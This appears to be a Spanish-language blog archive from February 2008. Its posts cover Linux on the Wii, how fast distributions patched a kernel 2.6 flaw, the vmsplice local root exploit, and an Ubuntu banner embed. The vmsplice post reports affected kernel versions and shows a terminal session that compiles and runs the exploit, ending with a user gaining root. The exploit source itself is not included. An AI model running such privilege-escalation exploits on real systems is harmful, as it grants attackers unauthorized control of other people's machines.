Archivos Febrero 2008

Gracias al Team Tweezers' twilight-hack Linux ya corre en la consola Wii de Nintendo en forma nativa, si! lo anterior abre un mundo de posibilidades con esta magnífica consola de juegos.

Aunque es necesario hacer un par de hacks para instalar esta minidistro Linux  en la Wii, cualquiera puede probarla, además esta noticia deja el camino abierto a el centro multimedia Wii que hasta ahora todos esperan, ya que en la actualidad esta faceta de la consola no es de lo mejor (por no decir que no existe).

Aplausos, felicitaciones para el Team a cargo de este hack, esperemos que su trabajo siga rindiendo frutos, así todos los dueños de una Wii no beneficiemos con su trabajo.

• Wiki del proyecto Linux en la Wii.
• Proyecto original, base del Wii Linux: GamecubeLinux.
• Vía Linux runs natively on the Wii | Digg

El Local Root Exploit en Kernel Linux 2.6, del que ya hablamos, y a grandes rasgos tenía que ver con la posibilidad de dar privilegios de administrador (root), a un usuario sin común. Ya fue solucionado, y la rapidez con que se dio repuesta, la verdad es que sorprende, esto a pesar de que este exploit no fue considerado crítico.Esta tabla muestra la rapidez con que parcharon el kernel las distintas distribuciones Linux, más populares:

1. Debian (0+ horas)
2. Fedora (8+ horas)
3. Slackware (12+ horas)
4. Mandriva (19+ horas)
5. Frugalware (21+ horas)
6. OpenSUSE (23+ horas)
7. rPath (26+ horas)
8. Red Hat Enterprise Linux (27+ horas)
9. Ubuntu (27+ horas)
10. CentOS (37+ horas)

En el artículo anterior hacia mención a la desventaja del software de código abierto, pero esta "rapidez" es una de las ventajas del mismo, ya que la comunidad que compone el mundo Linux, es sin duda muy eficiente, creo que debido a que no trabaja por un salario, si no que por una convicción y/o forma de ver y sentir la libertad.

*Velocidad de respuestas al exploit local contra el Kernel 2.6 | VivaLinux!

Este exploit afecta al Kernel Linux versión 2.6 de Ubuntu y Debian, el exploit es necesario ejecutarlo como usuario local, para así obtener identidad de root.

Los Kernel Linux afectados son desde la versión 2.6.17 hasta 2.6.24. Por el momento para solucionar el problema de seguridad, habría que compilar nuestro propio kernel eliminando vmsplice.

Pruebas hechas en Ubuntu apuntan a que funciona perfectamente en un Kernel 2.6.22-14-generic:

$ gcc exploit.c -o exploit
$ whoami
heikki
$ ./exploit
-------

----------------------------
Linux vmsplice Local Root Exploit
By qaaz
-----------------------------------
[+] mmap: 0x0 .. 0x1000
[+] page: 0x0
[+] page: 0x20
[+] mmap: 0x4000 .. 0x5000
[+] page: 0x4000
[+] page: 0x4020
[+] mmap: 0x1000 .. 0x2000
[+] page: 0x1000
[+] mmap: 0xb7d90000 .. 0xb7dc2000
[+] root
$ whoami
root

El software libre tiene sus pro y sus contras, lo bueno en este caso es que los detalles y la forma de solucionar el problema es ya conocido y se encuentra al alcance nuestro, pero lo negativo es que se dispone del exploit y los detalles en cuestión, el cual además son de muy fácil implementación para un usuario malicioso del sistema Linux afectado.

Linux Kernel 2.6 Local Root Exploit | Slashdot

Es muy común tener generalmente en el área del sidebar del blog, banner de las cosas que nos interesan o simplemente queremos comunicar a nuestros visitantes. Ubuntu Linux había publicado un banner alusivo a la navidad, el cual no se había actualizado, por eso era común ver algunos sitio / blog celebrando la navidad en Febrero :D. Bueno el problema se terminó por que se actualizaron los banners, los cuales pueden ser mostrados a los visitantes en forma aleatoria, insertando este código en tu blog:


<script type="text/javascript" src="http://crunchbang.net/advocacy/ubuntu_199_164.js">
</script>
<noscript>
<a href="http://ubuntu.com/getubuntu" title="Get Ubuntu!">
<img src="http://crunchbang.net/advocacy/199_164_ubuntu.png" alt="Get Ubuntu."></a>
</noscript>


Una forma de promocionar de Ubuntu, que tiene amplia aceptación de parte de la blogosfera, ¿Utilizas banners en tu blog?